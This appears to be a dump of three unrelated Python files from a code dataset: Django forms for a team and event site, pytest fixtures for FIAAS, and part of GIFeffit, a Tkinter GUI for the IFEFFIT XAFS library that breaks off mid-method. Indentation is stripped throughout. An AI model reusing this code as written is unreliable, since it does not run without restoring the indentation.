forms.Select(attrs=attrs, choices=[(i, "%02d" % i) for i in range(00, 60, 15)]),
forms.Select(attrs=attrs, choices=[('AM', _('AM')), ('PM', _('PM'))])
)
super(TimeWidget, self).__init__(widgets, attrs)
def decompress(self, value):
if isinstance(value, str):
try:
value = strptime(value, '%I:%M %p')
except:
value = strptime(value, '%H:%M:%S')
hour = int(value.tm_hour)
minute = int(value.tm_min)
if hour < 12:
meridian = 'AM'
else:
meridian = 'PM'
hour -= 12
return (hour, minute, meridian)
elif isinstance(value, time):
hour = int(value.strftime("%I"))
minute = int(value.strftime("%M"))
meridian = value.strftime("%p")
return (hour, minute, meridian)
return (None, None, None)
def value_from_datadict(self, data, files, name):
value = super(TimeWidget, self).value_from_datadict(data, files, name)
t = strptime("%02d:%02d %s" % (int(value[0]), int(value[1]), value[2]), "%I:%M %p")
return strftime("%H:%M:%S", t)
def format_output(self, rendered_widgets):
return '<span class="%s">%s%s%s</span>' % (
self.time_class,
rendered_widgets[0], rendered_widgets[1], rendered_widgets[2]
)
class DateTimeWidget(forms.SplitDateTimeWidget):
"""
A more-friendly date/time widget.
"""
def __init__(self, attrs=None, date_format=None, time_format=None):
super(DateTimeWidget, self).__init__(attrs, date_format, time_format)
self.widgets = (
DateWidget(attrs=attrs),
TimeWidget(attrs=attrs),
)
def decompress(self, value):
if value:
d = strftime("%Y-%m-%d", value.timetuple())
t = strftime("%I:%M %p", value.timetuple())
return (d, t)
else:
return (None, None)
def format_output(self, rendered_widgets):
return '%s %s' % (rendered_widgets[0], rendered_widgets[1])
def value_from_datadict(self, data, files, name):
values = super(DateTimeWidget, self).value_from_datadict(data, files, name)
return ' '.join(values)
class TeamForm(forms.ModelForm):
class Meta:
model = Team
fields = [
'name',
'description',
'about_page',
'category',
'city',
'web_url',
'tz',
'cover_img',
]
widgets = {
'city': Lookup(source=City),
}
raw_id_fields = ('city')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class NewTeamForm(forms.ModelForm):
class Meta:
model = Team
fields = [
'name',
'city',
'tz',
'cover_img',
]
widgets = {
'city': Lookup(source=City),
}
raw_id_fields = ('city')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class TeamDefinitionForm(forms.ModelForm):
class Meta:
model = Team
fields = ['category', 'web_url', 'description', 'about_page']
class DeleteTeamForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete team", required=True)
class TeamContactForm(forms.Form):
to = forms.ChoiceField(label=_(""))
body = forms.CharField(label=_(""), widget=forms.widgets.Textarea)
class MultiEmailField(forms.Field):
def to_python(self, value):
"""Normalize data to a list of strings."""
# Return an empty list if no input was given.
if not value:
return []
return [email.strip() for email in value.split(',')]
def validate(self, value):
"""Check if value consists only of valid emails."""
# Use the parent's handling of required fields, etc.
super().validate(value)
for email in value:
validate_email(email)
class TeamInviteForm(forms.Form):
to = MultiEmailField(label=_(""), widget=forms.widgets.Textarea)
class TeamEventForm(forms.ModelForm):
recurrences = recurrence.forms.RecurrenceField(label="Repeat", required=False)
class Meta:
model = Event
fields = ['name', 'start_time', 'end_time', 'recurrences', 'summary', 'web_url', 'announce_url', 'tags']
widgets = {
'place': Lookup(source=Place),
'start_time': DateTimeWidget,
'end_time': DateTimeWidget
}
def __init__(self, *args, **kargs):
super().__init__(*args, **kargs)
event_tz = pytz.timezone(self.instance.tz)
if self.instance.local_start_time: self.initial['start_time'] = self.instance.local_start_time
if self.instance.local_end_time: self.initial['end_time'] = self.instance.local_end_time
print("Initial: %s" % self.initial)
def clean(self):
cleaned_data = super().clean()
event_tz = pytz.timezone(self.instance.tz)
print("Clean: %s" % cleaned_data)
cleaned_data['start_time'] = pytz.utc.localize(timezone.make_naive(event_tz.localize(timezone.make_naive(cleaned_data['start_time']))))
cleaned_data['end_time'] = pytz.utc.localize(timezone.make_naive(event_tz.localize(timezone.make_naive(cleaned_data['end_time']))))
return cleaned_data
class NewTeamEventForm(forms.ModelForm):
recurrences = recurrence.forms.RecurrenceField(label="Repeat", required=False)
class Meta:
model = Event
fields = ['name', 'start_time', 'end_time', 'recurrences', 'summary']
widgets = {
'start_time': DateTimeWidget,
'end_time': DateTimeWidget
}
def __init__(self, *args, **kargs):
super().__init__(*args, **kargs)
event_tz = pytz.timezone(self.instance.tz)
if self.instance.local_start_time: self.initial['start_time'] = self.instance.local_start_time
if self.instance.local_end_time: self.initial['end_time'] = self.instance.local_end_time
print("Initial: %s" % self.initial)
def clean(self):
cleaned_data = super().clean()
event_tz = pytz.timezone(self.instance.tz)
print("Clean: %s" % cleaned_data)
cleaned_data['start_time'] = pytz.utc.localize(timezone.make_naive(event_tz.localize(timezone.make_naive(cleaned_data['start_time']))))
cleaned_data['end_time'] = pytz.utc.localize(timezone.make_naive(event_tz.localize(timezone.make_naive(cleaned_data['end_time']))))
return cleaned_data
class DeleteEventForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete event", required=True)
class CancelEventForm(forms.Form):
confirm = forms.BooleanField(label="Yes, cancel this event", required=True)
reason = forms.CharField(label=_("Reason for cancellation"), widget=forms.widgets.Textarea)
class EventInviteMemberForm(forms.Form):
member = forms.ChoiceField(label=_(""))
class EventInviteEmailForm(forms.Form):
emails = MultiEmailField(label=_(""), widget=forms.widgets.Textarea)
class EventContactForm(forms.Form):
to = forms.ChoiceField(label=_(""))
body = forms.CharField(label=_(""), widget=forms.widgets.Textarea)
class EventSeriesForm(forms.ModelForm):
class Meta:
model = EventSeries
fields = ['name', 'start_time', 'end_time', 'recurrences', 'summary']
widgets = {
'start_time': TimeWidget,
'end_time': TimeWidget
}
class DeleteEventSeriesForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete series", required=True)
class UploadEventPhotoForm(forms.ModelForm):
class Meta:
model = EventPhoto
fields = ['src', 'title', 'caption']
class EventCommentForm(forms.ModelForm):
class Meta:
model = EventComment
fields = ['body']
class SponsorForm(forms.ModelForm):
class Meta:
model = Sponsor
fields = ['name', 'web_url', 'logo']
class NewPlaceForm(forms.ModelForm):
class Meta:
model = Place
fields = ['name', 'address', 'city', 'longitude', 'latitude', 'place_url', 'tz']
widgets = {
'city': Lookup(source=City),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class UserForm(forms.ModelForm):
class Meta:
model = User
fields = ['email']
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['avatar', 'realname', 'city', 'tz', 'send_notifications']
labels = {
'send_notifications': _('Send me notification emails'),
}
widgets = {
'city': Lookup(source=City),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class ConfirmProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['avatar', 'realname', 'city']
widgets = {
'city': Lookup(source=City),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class SendNotificationsForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['send_notifications']
labels = {
'send_notifications': _('Send me notification emails'),
}
class SearchForm(forms.Form):
city = forms.IntegerField(required=False, widget=Lookup(source=City, label='name'))
distance = forms.IntegerField(label=_("Distance(km)"), required=True)
class Meta:
widgets ={
'city': Lookup(source=City, label='name'),
}
class NewCommonEventForm(forms.ModelForm):
class Meta:
model = CommonEvent
fields = [
'name',
'start_time',
'end_time',
'summary',
'country',
'spr',
'city',
'place',
'web_url',
'announce_url',
'category',
'tags',
]
widgets ={
'country': Lookup(source=Country, label='name'),
'spr': Lookup(source=SPR, label='name'),
'city': Lookup(source=City, label='name'),
'place': Lookup(source=Place, label='name'),
'start_time': DateTimeWidget,
'end_time': DateTimeWidget
}
class SpeakerBioForm(forms.ModelForm):
class Meta:
model = Speaker
fields = ['avatar', 'title', 'bio', 'categories']
class DeleteSpeakerForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete series", required=True)
class UserTalkForm(forms.ModelForm):
class Meta:
model = Talk
fields = ['speaker', 'title', 'abstract', 'talk_type', 'web_url', 'category']
class DeleteTalkForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete series", required=True)
class SchedulePresentationForm(forms.ModelForm):
class Meta:
model = Presentation
fields = ['start_time']
| StarcoderdataPython |
1617133 | #!/usr/bin/env python
# -*- coding: utf-8
# Copyright 2017-2019 The FIAAS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import yaml
@pytest.fixture
def load_app_config_testdata(request):
def _load(filename):
path = _find_file(filename+".yml", request.fspath.dirpath(), "examples")
with open(path, 'r') as fobj:
return yaml.safe_load(fobj)
return _load
@pytest.fixture
def load_app_config_transformations(request):
def _load(filename):
path = _find_file(filename+".yml", request.fspath.dirpath(), "transformations")
with open(path, 'r') as fobj:
return yaml.safe_load(fobj)
return _load
def _find_file(needle, root, kind):
parents = root.parts(True)
for parent in parents:
dirs = [parent]
for part in ("data", kind):
dirs.append(dirs[-1].join(part))
for d in dirs:
candidate = d.join(needle)
if candidate.check():
return candidate.strpath
raise ValueError("File {} not found".format(needle))
| StarcoderdataPython |
3233713 | <gh_stars>1-10
#!/usr/bin/python
##
## GIFEFFIT: Graphical User Interface to the IFEFFIT XAFS Analysis Library
##
## Copyright (c) 1997--2000 <NAME>, The University of Chicago
## Copyright (c) 1992--1996 <NAME>, University of Washington
##
## Permission to use and redistribute the source code or binary forms of
## this software and its documentation, with or without modification is
## hereby granted provided that the above notice of copyright, these
## terms of use, and the disclaimer of warranty below appear in the
## source code and documentation, and that none of the names of The
## University of Chicago, The University of Washington, or the authors
## appear in advertising or endorsement of works derived from this
## software without specific prior written permission from all parties.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
## IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
## CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
## TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
## SOFTWARE OR THE USE OR OTHER DEALINGS IN THIS SOFTWARE.
##
from Tkinter import *
from string import *
from Ifeffit import Ifeffit
from TkIfeffit import *
from DataPlotter import *
import re, os, sys, types
import Pmw, ScrolledText, tkFileDialog, tkColorChooser
from tkFileDialog import askopenfilename
# from Pmw import MessageDialog
class ReadDataFile(BaseWindow):
""" ReadDataFile Class: prompt for ASCII file name, guess array names,
allow them to be changed, and read in file"""
def __init__(self, iff_com=None, master=None):
self.iff_com = iff_com
self.master = master
self.main = None
self.input_file = ''
self.marray = 32
self.narray = 16
self.array_disp = 7
self.array = []
self.entr = []
self.file_type = StringVar()
self.file_type.set('<from column labels>')
for i in range(self.marray):
self.array.append('')
self.entr.append('')
self.read()
def btn_press(self,btn,event=None):
if ((btn == 'ok') or (btn == 'apply')):
self.read_cmd = self.read_final_file()
if ((btn == 'ok') or (btn == 'cancel')): self.main.destroy()
if (btn == 'newfile'):
self.main.withdraw()
self.read(self.master)
def ftype_choice(self,event=None):
x = event
if ((self.input_file == None) or (self.input_file == '')): return
if (x == '<from column labels>'):
self.read_temp_file()
else:
for i in range(self.marray): self.array[i] = ' '
if (x == 'xmu'):
self.array[0] = 'energy'
self.array[1] = 'xmu'
elif (x == 'chi'):
self.array[0] = 'k'
self.array[1] = 'chi'
elif (x == 'chi.dat'):
self.array[0] = 'k'
self.array[1] = 'chi'
self.array[2] = 'mag'
self.array[3] = 'phase'
elif (x == 'feff.dat'):
self.array[0] = 'k'
self.array[1] = 'cphase'
self.array[2] = 'mag'
self.array[3] = 'phase'
self.array[4] = 'redfactor'
self.array[5] = 'lambda'
self.array[6] = 'realp'
self.array_disp = 7
elif (x == 'rsp'):
self.array[0] = 'r'
self.array[1] = 'chi_re'
self.array[2] = 'chi_im'
self.array[3] = 'chi_mag'
self.array[4] = 'chi_phase'
for i in range(self.array_disp):
self.entr[i].delete(0,END)
self.entr[i].insert(0,self.array[i])
def read(self, master=None, title='Read ASCII Data File'):
self.input_file = ask_for_file(self.master,
[("data files","*.dat *.chi *.xmu"),
("all files","*")] )
if (master == None):
self.main = Tk()
else:
self.main = Toplevel(master)
Frame.__init__(self, self.main)
self.main.title(title)
self.main.option_add('*font', ('Helvetica', 12))
if ((self.input_file != None) and (self.input_file != '')):
self.read_temp_file()
self.display_arrays()
else:
self.main.destroy()
def display_arrays(self):
ma = self.main
self.balloon = Pmw.Balloon(ma)
self.menuBar = Pmw.MenuBar(ma, hull_borderwidth=1,
hull_relief = 'raised',
hotkeys=1, balloon = self.balloon)
self.menuBar.pack(fill='x')
self.menuBar.addmenu('File', 'Read, Cancel, Exit')
self.menuBar.addmenuitem('File', 'command',
'Read this file with these arrays',
label='Read',
command= Command(self.btn_press, 'apply'))
self.menuBar.addmenuitem('File', 'command',
'Do not read this file, Look for a new file',
label='Change File',
command= Command(self.btn_press, 'newfile'))
self.menuBar.addmenuitem('File', 'command',
'Close without reading these arrays from this file',
label='Cancel',
command= Command(self.btn_press, 'cancel'))
self.menuBar.addmenuitem('File', 'command',
'Read this file with these arrays, and exit',
label='OK',
command= Command(self.btn_press, 'ok'))
# file buffer display
self.f_win = Pmw.ScrolledText(ma,label_text=self.input_file,
borderframe = 1,usehullsize=0,
text_padx = 10, text_pady = 10,
labelpos=NW,
hull_width=650, hull_height=320)
self.f_win.importfile(self.input_file)
self.f_win.pack(side='top')
# group name
fr_0 = Frame(ma)
fr_0.pack(side='top',anchor='w')
fr_1 = Frame(fr_0)
fr_1.pack(side='left', fill='x',anchor='w')
fr1 = Frame(fr_1)
Label(fr1, text='Group: ').pack(side='left')
self.g_ent = Entry(fr1,width=20)
self.g_ent.selection_clear()
self.g_ent.insert(0,self.group)
self.g_ent.pack(side='left',fill='x')
fr1.pack(side='left',fill='x')
fr_4 = Frame(fr_0)
fr_4.pack(side='left', fill='x',anchor='w')
self.file_type.set('<from column labels>')
self.ftypes = Pmw.OptionMenu(fr_4, labelpos = 'w',
label_text = ' Column File Types: ',
menubutton_textvariable = self.file_type,
menubutton_width = 22,
items = ['<from column labels>',
'xmu','chi','rsp', 'chi.dat', 'feff.dat'],
initialitem = '<from column labels>',
command = Command(self.ftype_choice),
)
# menubutton_width = 18)
self.ftypes.pack(side='left',fill='x')
# arrays name
fr_2 = Frame(ma)
fr_2.pack(side='top',anchor='w')
fr2 = Frame(fr_2)
Label(fr2, text='Arrays: ').pack(side='left')
for i in range(self.array_disp):
self.entr[i] = Entry(fr2, width=10)
self.entr[i].selection_clear()
self.entr[i].insert(0,self.array[i])
self.entr[i].pack(side='left')
fr2.pack(side='top')
#
fr_3 = Frame(ma)
bbox = Pmw.ButtonBox(fr_3)
bbox.pack(side='left',fill='both', expand=1)
b_ok= bbox.add('OK', command = Command(self.btn_press,'ok'))
b_rd= bbox.add('Read', command = Command(self.btn_press,'apply'))
b_ca= bbox.add('Done', command = Command(self.btn_press,'cancel'))
b_nf=bbox.add('Change File', command = Command(self.btn_press,'newfile'))
bbox.setdefault('Read')
bbox.alignbuttons()
self.balloon.bind(b_ok, '',
'Read these arrays from this file and exit')
self.balloon.bind(b_rd, '',
'Read these arrays from this file')
self.balloon.bind(b_ca, '',
'Close without reading these arrays from this file')
self.balloon.bind(b_nf, '',
'Do not read these arrays, Look for a new file')
fr_3.pack()
self.createMsgWin(ma)
def read_temp_file(self):
if ((self.input_file == '') or (self.input_file == None)): return
self.iff_com('read_data(group=_xx_,notitles,type=label,file=%s)'
% self.input_file)
col_lab = strip(self.get_string('column_label'))
if (col_lab == '--undefined--'):
self.iff_com('read_data(group=_xx_,notitles,type=raw,file=%s)'
% self.input_file)
col_lab = strip(self.get_string('column_label'))
if (col_lab == '--undefined--'):
self.f_win.clear()
self.f_win.settext(' Invalid File: ' + self.input_file )
self.group = ' '
for i in range(self.marray): self.array[i] = ' '
return
tmp_lis = split(col_lab)
s = os.path.basename(self.input_file)
x = split(s,'.')
self.group = x[0]
self.narray = min(self.marray,len(tmp_lis))
for i in range(self.marray): self.array[i] = ' '
for i in range(self.narray): self.array[i] = tmp_lis[i]
g = self.group
# erase temp arrays
for i in range(self.marray):
a = self.array[i]
if (a != ' '): s = self.iff_com('erase _XX_.%s' % a)
def read_final_file(self):
if ((self.input_file=='') or (self.input_file == None)): return
g = self.g_ent.get()
c = 'read_data(file=%s, group=%s,label=(' %(self.input_file, g)
# print ' array size = ' , self.narray, self.marray
for i in range(self.narray):
d = self.array[i]
if (i < self.array_disp): d = self.entr[i].get()
c = c + d + ' '
self.iff_com( c + '))')
###############################################################################
##
## GIFEFFIT CLASS
##
###############################################################################
class GIFeffit(BaseWindow,Ifeffit):
progname = "<NAME>"
version = "0.9"
copyright = """ Copyright (c) 2000 <NAME> \n The University of Chicago"""
contact = """ email: <EMAIL> \n web: http://cars9.uchicago.edu/ifeffit/ """
def __init__(self, load=None):
self.root = Tk()
# launch Ifeffit in screen_echo = 0 mode
Ifeffit.__init__(self, screen_echo = 0)
# self.iff_com = self.ifeffit
self.root.option_add('*font', ('Helvetica', 12))
self.drawsplash(self.root)
Pmw.initialise(self.root)
self.root.withdraw()
self.root.title('G.I.Feffit')
self.inp_buff = [] # command buffer
self.ind_ = 0 # index in inp_buff
self.plot_opts = self.reset_plot_opts()
self.prefs = {}
self.feff_paths= {}
self.ask_exit = 1
self.iff_com = self.do_ifeffit
self.balloon = Pmw.Balloon(self.root)
self.inp_buff.append("") ;
self.createMenubar(self.root)
self.createMainWin(self.root)
self.root.mainloop()
def drawsplash(self,master):
# Create about dialog.
Pmw.aboutversion(self.version)
Pmw.aboutcopyright(self.copyright)
Pmw.aboutcontact(self.contact)
self.about = Pmw.AboutDialog(master, applicationname = self.progname)
self.about.after(2000,self.removesplash)
def removesplash(self):
self.root.deiconify()
self.iff_com("newplot")
self.clear_echo_buffer()
self.about.withdraw()
def createMainWin(self,master=None):
pane = Pmw.PanedWidget(master,hull_width=700,hull_height=350)
pane.add('top',min=80,max=800)
pane.add('bot',min=50,max=60)
nbFrame = Pmw.NoteBook(pane.pane('top'),
raisecommand= Command(self.nb_raise))
nbFrame.pack(fill = 'both', expand= 1, padx = 1, pady = 1)
# Add the "Appearance" page to the notebook.
cmd_page = nbFrame.add('Command Buffer')
sca_page = nbFrame.add('Scalars')
arr_page = nbFrame.add('Arrays')
str_page = nbFrame.add('Strings')
mac_page = nbFrame.add('Macros')
pth_page = nbFrame.add('Feff Paths')
self.nbframe = nbFrame
self.balloon.bind(cmd_page, '', 'Ifeffit commands and raw output')
self.balloon.bind(sca_page, '', 'Ifeffit scalars')
self.balloon.bind(arr_page, '', 'Ifeffit arrays')
self.balloon.bind(str_page, '', 'Ifeffit strings')
self.balloon.bind(mac_page, '', 'Macros')
self.balloon.bind(pth_page, '', 'Feff Path Definitions')
self.cmd_win = ScrolledText.ScrolledText(cmd_page)
self.cmd_win.configure(width=85, height=40)
self.cmd_win.tag_configure('output', foreground='red',font=('Helvetica', 12))
self.cmd_win.tag_configure('input', font=('Helvetica', 12))
self.cmd_win.pack(side='top')
self.sca_win = ScrolledText.ScrolledText(sca_page)
self.sca_win.configure(width=85, height=40, font=('Courier', 12))
self.sca_win.insert('end', "\n\n")
self.sca_win.pack(side='top')
self.arr_win = ScrolledText.ScrolledText(arr_page)
self.arr_win.configure(width=85, height=40, font=('Courier', 12))
self.arr_win.insert('end', "\n\n")
self.arr_win.pack(side='top')
self.str_win = ScrolledText.ScrolledText(str_page)
self.str_win.configure(width=85, height=40, font=('Courier', 12))
self.str_win.insert('end', "\n\n")
self.str_win.pack(side='top')
self.mac_win = ScrolledText.ScrolledText(mac_page)
self.mac_win.configure(width=85, height=40)
self.mac_win.insert('end', "\n\n")
self.mac_win.pack(side='top')
self.pth_win = ScrolledText.ScrolledText(pth_page)
self.pth_win.configure(width=85, height=40)
self.pth_win.insert('end', "\n\n")
self.pth_win.pack(side='top')
nbFrame.setnaturalsize()
self.cmdBox = Frame(pane.pane('bot'))
self.cmdFrame = Frame(self.cmdBox)
Label(self.cmdFrame, text='Ifeffit>').pack(side='left')
self.cmdBox.pack(side='top', anchor='w')
self.cmdFrame.pack(anchor='w', side='left',fill='x')
self.command = StringVar()
self.field = Entry(self.cmdFrame, width=64)
self.balloon.bind(self.field, '',
'Enter Ifeffit commands or use arrows to scroll through commands')
self.field['textvariable'] = self.command
self.field.bind('<Return>', self.process)
self.field.bind('<Up>', self.process)
self.field.bind('<Down>', self.process)
self.field.pack(side='left')
self.createMsgWin(pane.pane('bot'))
pane.pack(expand = 1, fill = 'both')
def createMenubar(self, master):
self.menuBar = Pmw.MenuBar(master, hull_borderwidth=1,
hull_relief = 'raised',
hotkeys=1, balloon = self.balloon)
self.menuBar.pack(fill='x')
self.menuBar.addmenu('File', 'Read Files or Exit')
# self.menuBar.addcascademenu('File', 'Read')
self.menuBar.addmenuitem('File', 'command', 'Read Data File',
label='Read Data File',
command=Command(self.read_datafile, self.root))
self.menuBar.addmenuitem('File', 'command', 'Load Command File',
label='Read Command File',
command=Command(self.read_cmndfile, self.root))
self.menuBar.addmenuitem('File', 'command',
'Restore a saved session from a .sav file',
label='Read Saved Session',
command=Command(self.restore_state, self.root))
self.menuBar.addmenuitem('File', 'separator')
# self.menuBar.addcascademenu('File', 'Write')
# self.menuBar.addmenuitem('Write', 'command', 'Write Data File',
# label='Write Data File',
# command=Command(self.write_datafile, self.root))
self.menuBar.addmenuitem('File', 'command', 'Write Command File',
label='Write Command File',
command=Command(self.write_cmndfile, self.root))
self.menuBar.addmenuitem('File', 'command', 'Save session to .sav file',
label='Save session',
command=Command(self.save_state, self.root))
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Close', label='Exit',
command=Command(self.exit))
self.menuBar.addmenu('Help', 'About', side='right')
self.menuBar.addmenuitem('Help', 'command', 'Get information on application',
label='About...', command=self.help)
# self.menuBar.addmenu('Edit', 'Edit Text and Preferences')
# self.menuBar.addmenuitem('Edit', 'command', 'Define and Edit Macros',
# label='Macros',
# command=Command(self.macro_editor, self.root))
# self.menuBar.addmenuitem('Edit', 'command', 'Equaton Editor',
# label='Equation Editor',
# command=Command(self.macro_editor, self.root))
# self.menuBar.addmenuitem('Edit', 'separator')
# self.menuBar.addmenuitem('Edit', 'command', 'Plot Preferences',
# label='Plot Preferences',
# command=Command(self.setplot_opts, self.root))
#
# self.menuBar.addmenuitem('Edit', 'command', 'General Preferences',
# label='General Preferences',
# command=Command(self.set_prefs, self.root))
self.menuBar.addmenu('Plotting', 'General Data Plotting')
self.menuBar.addmenuitem('Plotting', 'command',
'General Plot Interface', label='Plotter',
command=Command(self.plotter, self.root))
self.menuBar.addmenu('XAFS', 'XAFS Data Analysis ')
self.menuBar.addmenuitem('XAFS', 'command',
'EXAFS Pre-Edge and Normalization',
label='Pre-Edge',
command=Command(self.pre_edge, self.root))
self.menuBar.addmenuitem('XAFS', 'command',
'EXAFS Background Subtraction',
label='Background',
command=Command(self.autobk, self.root))
self.menuBar.addmenuitem('XAFS', 'command',
'EXAFS Fourier Transforms',
label='FFT ',
command=Command(self.fft, self.root))
# self.menuBar.addmenuitem('Analysis', 'command',
# 'Define FEFF Path',
# label='Define FEFF Paths',
# command=Command(self.def_paths, self.root))
def process(self, event):
if ( event.keysym == 'Return'):
cmd = self.command.get()
self.do_ifeffit(cmd)
else:
dir = 0
if (event.keysym == 'Up'): dir = -1
if (event.keysym == 'Down'): dir = 1
self.ind_ = self.ind_ + dir
if (self.ind_ < 1):
self.ind_ = 0
self.command.set("")
elif (self.ind_ == len(self.inp_buff)):
self.command.set("")
self.ind_ = self.ind_ - 1
else:
self.command.set(self.inp_buff[self.ind_])
def do_ifeffit(self,cmd="",do_raise=1):
"""execute Ifeffit command in GIFeffit's Notebook motif,
updating the Command Buffer and currently raised page"""
ret = 0
cmd = strip(cmd)
if (cmd != ""):
if ((cmd == 'quit') or (cmd =='exit')):
self.exit(prompt=self.ask_exit)
elif (cmd == 'pwd'):
s = os.getcwd()
self.cmd_win.insert('end'," %s\n" % cmd, 'input')
self.cmd_win.insert('end'," %s\n" % s, 'output')
self.command.set("")
self.cmd_win.see('end')
elif ((cmd == 'cd') or (cmd[0:3] == 'cd ')):
try:
os.chdir(cmd[3:])
except OSError:
pass
s = os.getcwd()
self.cmd_win.insert('end'," %s\n" % cmd, 'input')
self.cmd_win.insert('end'," %s\n" % s, 'output')
self.command.set("")
self.cmd_win.see('end')
elif ((cmd[0:3] == 'ls ') or (cmd[0:4] == 'dir ') or
(cmd == 'ls') or (cmd == 'dir')):
self.cmd_win.insert('end'," %s\n" % cmd, 'input')
t = os.getcwd()
self.cmd_win.insert('end'," %s:\n" % t, 'output')
s = os.listdir(t)
s.sort()
out = ''
for i in range(len(s)):
lsi = len(s[i])
if (lsi < 20):
out = out + s[i] + ' '*(22 - lsi)
else:
out = out + s[i] + ' '
if (len(out) > 71):
self.cmd_win.insert('end'," %s\n" % out, 'output')
out = ''
if (len(out) > 1):
self.cmd_win.insert('end'," %s\n" % out, 'output')
out = ''
self.command.set("")
self.cmd_win.see('end')
elif (cmd[0:1] == '!'):
os.system(cmd[1:])
self.command.set("")
else:
ret = self.iff_exec(cmd)
self.inp_buff.append(cmd)
self.cmd_win.insert('end'," %s\n" % cmd, 'input')
self.command.set("")
self.cmd_win.see('end')
self.ind_ = len(self.inp_buff)
self.add_echo_lines(self.cmd_win, erase=0)
# update the currently raised window
if (do_raise == 1):
raised = self.nbframe.getcurselection()
self.nb_raise(raised)
return ret
def nb_raise(self,page):
if (page == 'Arrays'): self.arrays_update()
elif (page == 'Scalars'): self.scalars_update()
elif (page == 'Strings'): self.strings_update()
elif (page == 'Macros'): self.macros_update()
elif (page == 'Feff Paths'): self.paths_update()
def arrays_update(self):
self.clear_echo_buffer()
self.iff_com("show @arrays")
self.add_echo_lines(self.arr_win, erase=1)
def scalars_update(self):
self.clear_echo_buffer()
self.iff_com("show @scalars")
self.add_echo_lines(self.sca_win, erase=1)
def strings_update(self):
self.clear_echo_buffer()
self.iff_com("show @strings")
self.add_echo_lines(self.str_win, erase=1)
def macros_update(self):
self.clear_echo_buffer()
self.iff_com("show @macros")
self.mac_win.delete(0.0, self.mac_win.index('end') )
self.mac_win.tag_configure('desc', foreground='darkgreen', font=('Helvetica', 12))
self.mac_win.tag_configure('args', foreground='red', font=('Helvetica', 12))
nmac = 0
macargs = []
macdesc = []
buff = self.get_echo_buffer()
for s in buff:
if (s[0:5] == 'macro'):
sx = re.split(r',*\s+', strip(s[6:]))
macargs.append(sx)
macdesc.append("")
nmac = nmac + 1
else:
if (nmac > 0): macdesc[nmac-1] = s
for i in range(nmac):
self.mac_win.insert('end', "macro %s" % macargs[i][0])
self.mac_win.insert('end', " ")
for j in range(1,len(macargs[i])):
self.mac_win.insert('end', " %s" % macargs[i][j], 'args')
self.mac_win.insert('end', "\n")
if (macdesc[i] != ""): self.mac_win.insert('end', " %s\n" % macdesc[i], 'desc')
self.iff_com("show %s " % macargs[i][0])
skip = 1
if (macdesc[i] != ""): skip = 2
buff = self.get_echo_buffer()
i = 0
for s in buff:
i = i + 1
if ((i > skip) and (s != 'end macro')):
self.mac_win.insert('end', " %s\n" % s)
self.mac_win.see('end')
def paths_update(self):
self.clear_echo_buffer()
self.iff_com("show @paths")
self.add_echo_lines(self.pth_win, erase=1)
def add_echo_lines(self, win, erase=1):
if (erase == 1): win.delete(0.0, win.index('end') )
buff = self.get_echo_buffer()
for s in buff:
if (win == self.cmd_win):
win.insert('end', "# %s\n" % s, 'output')
elif ((win == self.sca_win) and (s[0:1] == '&')):
pass
elif ((win == self.str_win) and (s[0:2] == '$&')):
pass
else:
win.insert('end', " %s\n" % s)
win.see('end')
def read_datafile(self, master):
ReadDataFile(iff_com=self.do_ifeffit, master=master)
def read_cmndfile(self, master):
ReadCmndFile(iff_com=self.do_ifeffit, master=master)
def write_datafile(self, master):
WriteDataFile(master=master)
def write_cmndfile(self, master):
WriteCmndFile(master=master, buffer = self.inp_buff)
def save_state(self, master):
xfile = tkFileDialog.asksaveasfilename(
filetypes=[("save files","*.sav"),
("all files","*")],
initialfile = 'ifeffit.sav' , parent=master)
xfile = trim_cwd(xfile)
if (xfile != ''):
self.do_ifeffit("save(file=\"%s\")" % xfile)
def restore_state(self, master):
xfile = ""
xfile = tkFileDialog.askopenfilename(
filetypes=[("save files","*.sav"),
("all files","*")], parent=master)
xfile = trim_cwd(xfile)
if (xfile != ''):
self.do_ifeffit("restore(file=\"%s\")" % xfile)
def plotter(self,master):
DataPlotter(iff_com = self.do_ifeffit,
master=master, plot_opts= self.plot_opts)
def set_prefs(self, master):
SetPrefs(master=master, prefs = self.prefs)
def pre_edge(self,master):
PreEdge(iff_com = self.do_ifeffit, master=master)
def autobk(self,master):
Spline(iff_com = self.do_ifeffit, master=master)
def fft(self,master):
Ifft(iff_com = self.do_ifeffit, master=master)
def def_paths(self,master):
Paths(iff_com = self.do_ifeffit, master=master,paths=self.feff_paths)
def macro_editor(self,master):
pass
def exit(self,prompt=1):
res = 'Yes'
if (prompt == 1):
d = Pmw.MessageDialog(self.root,
title = 'Save Ifeffit Session?',
defaultbutton = 0,
